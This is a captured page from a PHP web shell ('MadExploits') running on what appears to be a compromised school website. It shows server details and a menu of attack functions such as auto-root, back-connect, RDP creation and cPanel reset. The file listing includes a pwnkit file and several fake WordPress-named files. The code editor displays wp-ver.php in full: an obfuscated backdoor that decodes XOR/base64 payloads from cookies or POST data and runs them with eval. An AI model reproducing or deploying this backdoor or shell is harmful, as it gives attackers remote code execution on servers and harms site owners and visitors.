Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.138.122.90
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
sangha /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
web
[ DIR ]
drwxr-xr-x
.ftpquotas
37.58
KB
-rw-r--r--
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
14.33
KB
-rw-r--r--
academic.php
10.43
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
admin.php
0
B
-r--r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rw-r--r--
config.php
284
B
-rw-r--r--
contact.php
1.77
KB
-rw-r--r--
error_log
212.84
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
5.97
KB
-rw-r--r--
gallery.php
1.54
KB
-rw-r--r--
header.php
10.88
KB
-rw-r--r--
htaccess
197
B
-rw-r--r--
index.php
23.12
KB
-rw-r--r--
news-coverage.php
1.32
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rw-r--r--
sangha.zip
30.61
MB
-rw-r--r--
tc.php
3.14
KB
-rw-r--r--
theschool.php
4.27
KB
-rw-r--r--
wp-admin.php
3.37
KB
-rw-r--r--
wp-blog-header.php
4.57
KB
-rw-r--r--
wp-comment.php
0
B
-r--r--r--
wp-corn-sample.php
22.77
KB
-rw-r--r--
wp-cron.php
4.57
KB
-rw-r--r--
wp-include.php
356
B
-rw-r--r--
wp-logln.php
20.31
KB
-rw-r--r--
wp-ver.php
803
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-ver.php
<?php @set_time_limit(0); function shdp($data, $key) { $out_data = ""; for ($i = 0; $i < strlen($data);) { for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) { $out_data .= chr(ord($data[$i]) ^ ord($key[$j])); } } return $out_data; } if (isset($_GET['2035'])) { exit(md5('2035')); } $temp = array_merge($_COOKIE, $_POST); foreach ($temp as $data_key => $data) { $data = json_decode(shdp(shdp(base64_decode($data), 'cfdf5407cd509d3c3c46bbfc304a62d6'), $data_key), true); if (isset($data['ak'])) { if ($data['a'] == 'i') { $i = array('pv' => @phpversion(), 'sv' => '1.0-1',); echo @json_encode($i); } elseif ($data['a'] == 'e') { eval($data['d']); } exit(); } }
Close